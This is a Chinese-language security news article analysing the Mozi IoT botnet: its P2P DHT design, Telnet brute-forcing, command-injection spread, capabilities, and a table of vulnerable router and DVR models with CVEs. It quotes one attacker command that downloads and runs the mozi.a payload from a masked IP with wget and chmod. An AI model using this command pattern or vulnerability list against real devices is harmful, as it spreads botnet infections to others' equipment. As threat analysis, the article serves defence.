Mozi是一个物联网僵尸网络,它借鉴了Mirai变体和Gafgyt恶意软件的代码,该代码于2019年底出现在威胁领域。
Mozi僵尸网络被发现后,当时它正通过探测弱Telnet密码来破坏它们,从而积极针对Netgear,D-Link和华为路由器。
根据研究人员的说法,在2019年的最后几个月中,僵尸网络主要参与了DDoS攻击。
它实现了自定义扩展的分布式哈希表(DHT)协议,该协议提供类似于哈希表([key,value])的查找服务。
“ Mozi僵尸网络依靠DHT协议来构建P2P网络,并使用ECDSA384和xor算法来确保其组件和P2P网络的完整性和安全性。该示例通过带有弱密码和某些已知漏洞的Telnet通过Telnet传播(请参见下面的列表)。在功能方面,Mozi僵尸网络中每个节点的指令的执行由僵尸网络主服务器发出的称为Config的有效负载驱动。”
这种实现方式使使用最少的解决方案密钥添加/删除节点变得简单。
Mozi僵尸网络使用自己的扩展DHT协议实现来构建P2P网络。
该恶意软件通过尝试猜测目标设备的Telnet密码并利用已知漏洞进行传播。一旦获得对设备的访问权限,该漫游器便会尝试执行恶意有效负载,并且该漫游器将自动加入Mozi P2P网络。
僵尸网络支持以下功能:
- DDoS攻击
- 收集机器人信息
- 执行指定URL的有效载荷
- 从指定的URL更新样本
- 执行系统或自定义命令
Mozi僵尸网络占2019年10月至2020年6月观察到的IoT网络流量的90%。如果我们认为与其他僵尸程序不同,它没有试图从受感染设备中移除竞争对手,那么这个百分比令人印象深刻。
研究人员认为,Mozi运营商将配置不良的设备作为攻击目标,但导致物联网攻击激增的因素之一是威胁行为者可以瞄准的“不断扩大的物联网格局”。全球大约有310亿个IoT设备部署,而IoT部署速率现在是每秒127个设备。
“ Mozi在很大程度上继续通过使用命令注入(CMDi)攻击获得成功,这通常是由于IoT设备的配置错误造成的。” 物联网使用率的持续增长和配置协议不完善是造成这一跃迁的罪魁祸首。由于COVID-19,更频繁地远程访问公司网络可能进一步推动了这一增长。”
CMDi攻击对于IoT设备非常普遍,在Mozi攻击的情况下,威胁参与者通过使用“ wget” shell命令然后更改权限以允许黑客与受影响的系统进行交互来利用CMDi。
在最近的Mozi攻击中,威胁行动者使用以下命令来确定设备是否易受CMDi攻击,然后他们将下载并执行“ mozi.a”文件。
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a
“我们对这个特定样本的分析表明,该文件在没有互锁管线级(MIPS)架构的微处理器上执行。这是运行简化指令集计算机(RISC)架构的机器所理解的扩展,该架构在许多IoT设备上都很普遍。” 继续分析。“一旦攻击者通过僵尸网络获得对设备的完全访问权限,就可以更改固件级别,并且可以在设备上植入其他恶意软件。”
Mozi僵尸网络针对以下设备:
| 受影响的设备 | 脆弱性 |
| Eir D1000路由器 | Eir D1000无线路由器RCI |
| Vacron NVR设备 | 瓦克龙NVR RCE |
| 使用Realtek SDK的设备 | CVE-2014-8361 |
| Netgear R7000和R6400 | Netgear cig-bin命令注入 |
| DGN1000 Netgear路由器 | Netgear setup.cgi未经身份验证的RCE |
| MVPower DVR | JAWS Web服务器未经身份验证的Shell命令执行 |
| 华为路由器HG532 | CVE-2017-17215 |
| D-Link设备 | HNAP SoapAction-Header命令执行 |
| GPON路由器 | CVE-2018-10561,CVE-2018-10562 |
| D-Link设备 | UPnP SOAP TelnetD命令执行 |
| 闭路电视录像机 | CCTV / DVR远程执行代码 |
